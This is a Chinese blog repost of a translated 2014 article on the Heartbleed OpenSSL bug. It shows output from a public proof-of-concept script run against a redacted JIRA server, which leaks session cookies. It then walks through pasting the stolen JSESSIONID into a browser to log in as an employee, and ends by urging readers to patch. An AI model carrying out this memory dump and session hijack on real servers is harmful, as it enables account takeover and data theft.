Chinaunix首页 | 论坛 | 博客
  • 博客访问: 333174
  • 博文数量: 106
  • 博客积分: 1115
  • 博客等级: 少尉
  • 技术积分: 806
  • 用 户 组: 普通用户
  • 注册时间: 2006-08-04 08:06
文章分类

全部博文(106)

文章存档

2015年(4)

2014年(48)

2013年(15)

2012年(38)

2011年(1)

我的朋友

分类: 网络与安全

2014-04-10 22:55:27


Heartbleed 问题实际上比它现在能被看出来的更糟糕(其实现在看起来已经很坏了)。

Heartbleed (CVE-2014-0160) 是一个 OpenSSL 的漏洞,允许任何远程用户将服务器的一些内存进行转储。是的,这真的很糟糕。最值得关注的是,一个熟练的用户可以利用它通过一个流程将服务器用来与客户沟 通的RSA私钥转储下来。发起这种攻击所要求的知识/技能水平并不是特别高,但可能超过脚本初级用户的平均水平。

那么为什么说 Heartbleed 比你想的更糟呢? 这很简单:目前可用的概念性证据的脚本允许任何客户端,在世界任何地方,进行用户登录的。


翻译于 昨天(12:56)

3人顶

 翻译的不错哦!

就在今天早上,被最广泛共享的概念性证明是这样一个简单的Python脚本: 。通过这个脚本,世界上任何人都可以从一个脆弱的服务器上转储一部分内存。

让我们看一看这个工具(它针对正在运行JIRA的问题跟踪系统的脆弱服务器的)的输出结果。为提高可读性,其中十六进制的输出部分已被删除。

01  [matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
02  Connecting...
03  Sending Client Hello...
04  Waiting for Server Hello...
05  ... received message: type = 22, ver = 0302, length = 66
06  ... received message: type = 22, ver = 0302, length = 3239
07  ... received message: type = 22, ver = 0302, length = 331
08  ... received message: type = 22, ver = 0302, length = 4
09  Sending heartbeat request...
10  ... received message: type = 24, ver = 0302, length = 16384
11  Received heartbeat response:
12 .@..GET /browse/
13  en_US-cubysj-198
14  8229788/6160/11/
15 (lots of garbage)
16 ..............Ac
17  cept-Encoding: g
18  zip,deflate,sdch
19  ..Accept-Languag
20  e: en-US,en;q=0.
21  8..Cookie: atlas
22  sian.xsrf.token=
23  BWEK-0C0G-BSN7-V
24  OZ1|3d6d84686dc0
25  f214d0df1779cbe9
26  4db6047b0ae5|lou
27  t; JSESSIONID=33
28  F4094F68826284D1
29  8AA6D7ED1D554E..
30  ..E.$3Z.l8.M..e5
31  ..6D7ED1D554E...
32  ......*..?.e.b..
33 WARNING: server returned more data than it should - server is vulnerable!

这肯定是转储最近一个GET请求产生的内存。你注意到上面的 JSESSIONID Cookie 了吗?这是 JIRA 用来跟踪您的HTTP会话判断你是否已经登录的方式。如果这个系统需要验证(象JIRA的安装一样),那么我就可以将这个cookie插入到我的浏览器, 成为这个JIRA安装程序的合法用户。

插入 session ID cookie 到浏览器中(译注:现代浏览器的功能让人们更容易成为黑客了).


翻译于 昨天(12:39)

0人顶

 翻译的不错哦!

保存修改的 cookie 之后, 我们简单地刷新一下浏览器.

重新载入安装 JIRA . 注意,我们现在登录进安装程序中了.

如上所见, 一旦我们得到一个有效的 session ID cookie, 我们就能作为内部员工访问 JIRA 安装. 检测到这种类型的攻击的唯一方法是检查每个请求通信的源地址。

该 Heartbleed 漏洞是糟糕的,而且几乎没有做什么来防止远程攻击者可能执行一个允许绕过认证的会话劫持攻击。请给您的系统立即打上补丁吧。

阅读(763) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~